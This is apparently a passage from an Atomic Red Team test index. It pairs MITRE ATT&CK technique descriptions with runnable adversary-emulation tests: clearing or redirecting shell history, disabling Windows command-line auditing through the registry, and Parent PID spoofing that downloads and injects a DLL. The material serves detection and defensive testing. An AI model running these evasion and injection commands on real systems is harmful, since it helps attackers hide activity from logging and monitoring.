Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
supported_platforms:
- linux
executor:
name: bash
elevation_required: false
command: |
TEST=$(echo $HISTFILE)
echo $HISTFILE
export HISTFILE="/dev/null"
echo "runnning some commands to populate the history"
whoami
groups
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; else HIST_LENGHT=$(wc -l $HISTFILE); echo "\$HISTFILE is not /dev/null, history lenght is $HIST_LENGHT"; fi
cleanup_command: 'export HISTFILE=$(echo $TEST)
'
- name: Setting the HISTFILE environment variable (freebsd)
auto_generated_guid: f7308845-6da8-468e-99f2-4271f2f5bb67
description: |
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: |
echo $HISTFILE
export HISTFILE="/dev/null"
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
cleanup_command: 'export HISTFILE=~/.sh_history
'
- name: Setting the HISTIGNORE environment variable
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
description: "An Adversary may take advantage of the HISTIGNORE environment
variable either to ignore particular commands or all commands. \n\nIn this
test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this
history cache 3..4 execute ls commands 5. confirm that the ls commands are
not in the history cache 6. unset HISTIGNORE variable 7.. same again, but
ignoring ALL commands.\n"
supported_platforms:
- linux
executor:
name: bash
elevation_required: false
command: "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\";
fi\nhistory -c \nls -la $HISTFILE\nls -la ~/.bash_logout\nif [ $(history
|wc -l) -eq 1 ]; then echo \"ls commands are not in history\"; fi\nunset
HISTIGNORE\nif ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
else export HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\nhistory
-c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo \"History
cache is empty\"; fi\n"
cleanup_command: 'unset HISTIGNORE
'
- name: Disable Windows Command Line Auditing using reg.exe
auto_generated_guid: 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
description: "In Windows operating systems, command line auditing is controlled
through the following registry value:\n\n Registry Path: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\n
\ \n Registry Value: ProcessCreationIncludeCmdLine_Enabled\n\nWhen command
line auditing is enabled, the system records detailed information about command
execution, including the command executed, the user account responsible for
executing the command, and the timestamp of the execution.\nThis information
is crucial for security monitoring and forensic analysis, as it helps organizations
detect and investigate unauthorized or malicious activities within their systems.\nBy
default, command line auditing may not be enabled in Windows systems, and
administrators must manually configure the appropriate registry settings to
activate it.\nConversely, attackers may attempt to tamper with these registry
keys to disable command line auditing, as part of their efforts to evade detection
and cover their tracks while perpetrating malicious activities.\n\nBecause
this attack executes reg.exe using a command prompt, this attack can be detected
by monitoring both:\n Process Creation events for reg.exe (Windows Event
ID 4688, Sysmon Event ID 1)\n Registry events (Windows Event ID 4657, Sysmon
Event ID 13)\n\nRead more here:\nhttps://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html\n"
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
/v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
/v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
'
- name: Disable Windows Command Line Auditing using Powershell Cmdlet
auto_generated_guid: 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
description: "In Windows operating systems, command line auditing is controlled
through the following registry value:\n\n Registry Path: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\n
\ \n Registry Value: ProcessCreationIncludeCmdLine_Enabled\n\nWhen command
line auditing is enabled, the system records detailed information about command
execution, including the command executed, the user account responsible for
executing the command, and the timestamp of the execution.\nThis information
is crucial for security monitoring and forensic analysis, as it helps organizations
detect and investigate unauthorized or malicious activities within their systems.\nBy
default, command line auditing may not be enabled in Windows systems, and
administrators must manually configure the appropriate registry settings to
activate it.\nConversely, attackers may attempt to tamper with these registry
keys to disable command line auditing, as part of their efforts to evade detection
and cover their tracks while perpetrating malicious activities.\n\nBecause
this attack runs a Powershell cmdlet, this attack can be detected by monitoring
both:\n Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)\n
\ Registry events (Windows Event ID 4657, Sysmon Event ID 13)\n\nRead more
here:\nhttps://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key\n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: 'New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit"
-Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD
-Force -ErrorAction Ignore
'
cleanup_command: 'New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit"
-Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD
-Force -ErrorAction Ignore
'
T1556.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04
created: '2023-03-30T22:45:00.431Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/008
external_id: T1556.008
- source_name: NPPSPY - Huntress
description: " Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting
User Passwords to Adversaries With NPPSPY. Retrieved March 30, 2023."
url: https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy
- source_name: NPPSPY Video
description: Grzegorz Tworek. (2021, December 14). How winlogon.exe shares
the cleartext password with custom DLLs. Retrieved March 30, 2023.
url: https://www.youtube.com/watch?v=ggY3srD9dYs
- source_name: NPPSPY
description: Grzegorz Tworek. (2021, December 15). NPPSpy. Retrieved March
30, 2023.
url: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
- source_name: Network Provider API
description: Microsoft. (2021, January 7). Network Provider API. Retrieved
March 30, 2023.
url: https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api
- source_name: NPLogonNotify
description: Microsoft. (2021, October 21). NPLogonNotify function (npapi.h).
Retrieved March 30, 2023.
url: https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:51:56.379Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
process. Network provider DLLs allow Windows to interface with specific network
protocols and can also support add-on credential management functions.(Citation:
Network Provider API) During the logon process, Winlogon (the interactive
logon module) sends credentials to the local `mpnotify.exe` process via RPC.
The `mpnotify.exe` process then shares the credentials in cleartext with registered
credential managers when notifying that a logon event is happening.(Citation:
NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) \n\nAdversaries
can configure a malicious network provider DLL to receive credentials from
`mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via
the Registry), a malicious DLL can receive and save credentials each time
a user logs onto a Windows workstation or domain via the `NPLogonNotify()`
function.(Citation: NPLogonNotify)\n\nAdversaries may target planting malicious
network provider DLLs on systems known to have increased logon activity and/or
administrator logon activity, such as servers and domain controllers.(Citation:
NPPSPY - Huntress)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
- Jai Minton
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1497.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
created: '2020-03-06T21:04:12.454Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1497/002
external_id: T1497.002
- source_name: FireEye FIN7 April 2017
description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
LNK. Retrieved April 24, 2017.
url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- source_name: Unit 42 Sofacy Nov 2018
description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- source_name: Sans Virtual Jan 2016
description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
Evasion Techniques. Retrieved April 17, 2019.
url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
September 13, 2024.
url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:06.305Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
behaviors based on the results of checks for the presence of artifacts indicative
of a virtual machine environment (VME) or sandbox. If the adversary detects
a VME, they may alter their malware to disengage from the victim or conceal
the core functions of the implant. They may also search for VME artifacts
before dropping secondary or additional payloads. Adversaries may use the
information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
during automated discovery to shape follow-on behaviors.(Citation: Deloitte
Environment Awareness)\n\nAdversaries may search for user activity on the
host based on variables such as the speed/frequency of mouse movements and
clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks,
or number of files in common directories such as home or the desktop. Other
methods may rely on specific user interaction with the system before the malicious
code is activated, such as waiting for a document to close before activating
a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double
click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Deloitte Threat Library Team
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_version: '1.2'
atomic_tests: []
T1134.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a
created: '2020-02-18T18:22:41.448Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134/004
external_id: T1134.004
- source_name: XPNSec PPID Nov 2017
description: Chester, A. (2017, November 20). Alternative methods of becoming
SYSTEM. Retrieved June 4, 2019.
url: https://blog.xpnsec.com/becoming-system/
- source_name: CounterCept PPID Spoofing Dec 2018
description: Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved
June 3, 2019.
url: https://www.countercept.com/blog/detecting-parent-pid-spoofing/
- source_name: Microsoft UAC Nov 2018
description: Montemayor, D. et al.. (2018, November 15). How User Account
Control works. Retrieved June 3, 2019.
url: https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works
- source_name: Microsoft Process Creation Flags May 2018
description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
Retrieved June 4, 2019.
url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
- source_name: Secuirtyinbits Ataware3 May 2019
description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2)
Ataware Ransomware Part 3. Retrieved June 6, 2019.
url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3
- source_name: DidierStevens SelectMyParent Nov 2009
description: 'Stevens, D. (2009, November 22). Quickpost: SelectMyParent or
Playing With the Windows Process Tree. Retrieved June 3, 2019.'
url: https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/
- source_name: CTD PPID Spoofing Macro Mar 2019
description: Tafani-Dereeper, C. (2019, March 12). Building an Office macro
to spoof parent processes and command line arguments. Retrieved June 3,
2019.
url: https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:06.759Z'
name: 'Access Token Manipulation: Parent PID Spoofing'
description: |-
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
auto_generated_guid: '069258f4-2162-46e9-9a25-c9c6c56150d2'
description: |
This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process.
Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and
calc.exe will be launched.
Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1)
supported_platforms:
- windows
input_arguments:
parent_process_name:
description: Name of the parent process
type: string
default: explorer
spawnto_process_path:
description: Path of the process to spawn
type: path
default: C:\Program Files\Internet Explorer\iexplore.exe
dll_process_name:
description: Name of the created process from the injected dll
type: string
default: calculator
dll_path:
description: Path of the dll to inject
type: path
default: PathToAtomicsFolder\T1134.004\bin\calc.dll
spawnto_process_name:
description: Name of the process to spawn
type: string
default: iexplore
dependency_executor_name: powershell
dependencies:
- description: 'DLL to inject must exist on disk at specified location (#{dll_path})
'
prereq_command: 'if (Test-Path "#{dll_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
- description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
'
prereq_command: 'if (Test-Path "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1")
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1"
executor:
command: |
. "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1"
$ppid=Get-Process #{parent_process_name} | select -expand id
PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}"
cleanup_command: |
Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
- name: Parent PID Spoofing - Spawn from Current Process
auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25
description: Spawns a powershell.exe process as a child of the current process.
supported_platforms:
- windows
input_arguments:
file_path:
description: File path or name of process to spawn
type: path
default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
parent_pid:
description: PID of process to spawn from
type: string
default: "$PID"
command_line:
description: Specified command line to use
type: string
default: "-Command Start-Sleep 10"
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
''#{command_line}'' -ParentId #{parent_pid}'
name: powershell
- name: Parent PID Spoofing - Spawn from Specified Process
auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb
description: Spawns a notepad.exe process as a child of the current process.
supported_platforms:
- windows
input_arguments:
parent_pid:
description: PID of process to spawn from
type: string
default: "$PID"
test_guid:
description: Defined test GUID
type: string
default: 12345678-1234-1234-1234-123456789123
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
#{test_guid}'
name: powershell
- name: Parent PID Spoofing - Spawn from svchost.exe
auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591
description: Spawnd a process as a child of the first accessible svchost.exe
process.
supported_platforms:
- windows
input_arguments:
command_line:
description: Specified command line to use
type: string
default: "-Command Start-Sleep 10"
file_path:
description: File path or name of process to spawn
type: path
default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
Select-Object -First 1 | Start-ATHProcessUnderSpecificParent -FilePath #{file_path}
-CommandLine ''#{command_line}'''
name: powershell
- name: Parent PID Spoofing - Spawn from New Process
auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db
description: Creates a notepad.exe process and then spawns a powershell.exe
process as a child of it.
supported_platforms:
- windows
input_arguments:
command_line:
description: Specified command line to use
type: string
default: "-Command Start-Sleep 10"
file_path:
description: File path or name of process to spawn
type: path
default: "$Env:windir\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
parent_name:
description: Parent process to spoof from
type: path
default: "$Env:windir\\System32\\notepad.exe"
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
-FilePath #{file_path} -CommandLine ''#{command_line}'''
name: powershell
T1055.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5
created: '2020-01-14T01:35:00.781Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/014
external_id: T1055.014
- source_name: Backtrace VDSO
description: backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20210205211142/https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/
- source_name: Syscall 2014
description: Drysdale, D. (2014, July 16). Anatomy of a system call, part
2. Retrieved June 16, 2020.
url: https://lwn.net/Articles/604515/
- source_name: GNU Acct
description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved
December 20, 2017.
url: https://www.gnu.org/software/acct/
- source_name: RHEL auditd
description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide -
Chapter 7 - System Auditing. Retrieved December 20, 2017.
url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
- source_name: ArtOfMemoryForensics
description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
- source_name: ELF Injection May 2009
description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via
GOT poisoning. Retrieved March 15, 2020.
url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html
- source_name: VDSO Aug 2005
description: Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved
June 16, 2020.
url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/
- source_name: Chokepoint preload rootkits
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:08.040Z'
name: VDSO Hijacking
description: "Adversaries may inject malicious code into processes via VDSO
hijacking in order to evade process-based defenses as well as possibly elevate
privileges. Virtual dynamic shared object (vdso) hijacking is a method of
executing arbitrary code in the address space of a separate live process.
\n\nVDSO hijacking involves redirecting calls to dynamically linked shared
libraries. Memory protections may prevent writing executable code to a process
via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008).
However, an adversary may hijack the syscall interface code stubs mapped into
a process from the vdso shared object to execute syscalls to open and map
a malicious shared object. This code can then be invoked by redirecting the
execution flow of the process via patched memory address references stored
in a process' global offset table (which store absolute addresses of mapped
library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace
VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)\n\nRunning code in
the context of another process may allow access to the process's memory, system/network
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.2'
atomic_tests: []
T1679:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--9b00925a-7c4b-4e53-bfc8-9a6a806fde03
created: '2025-09-25T14:45:54.760Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1679
external_id: T1679
- source_name: Palo Alto Unit 42 Medusa Group Medusa Ransomware January 2024
description: Anthony Galiette, Doel Santos. (2024, January 11). Medusa Ransomware
Turning Your Files into Stone. Retrieved October 15, 2025.
url: https://unit42.paloaltonetworks.com/medusa-ransomware-escalation-new-leak-site/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-22T03:50:30.406Z'
name: Selective Exclusion
description: "Adversaries may intentionally exclude certain files, folders,
directories, file types, or system components from encryption or tampering
during a ransomware or malicious payload execution. Some file extensions that
adversaries may avoid encrypting include `.dll`, `.exe`, and `.lnk`.(Citation:
Palo Alto Unit 42 Medusa Group Medusa Ransomware January 2024) \n\nAdversaries
may perform this behavior to avoid alerting users, to evade detection by security
tools and analysts, or, in the case of ransomware, to ensure that the system
remains operational enough to deliver the ransom notice. \n\nExclusions may
target files and components whose corruption would cause instability, break
core services, or immediately expose the attack. By carefully avoiding these
areas, adversaries maintain system responsiveness while minimizing indicators
that could trigger alarms or otherwise inhibit achieving their goals. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1574.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd
created: '2020-03-12T20:43:53.998Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/010
external_id: T1574.010
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:09.575Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1562.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a0f84e1d-d25c-4dd1-bb26-3c0e68471530
created: '2025-09-22T18:31:06.483Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562/013
external_id: T1562.013
- source_name: Exposed Fortinet Fortigate firewall interface leads to LockBit
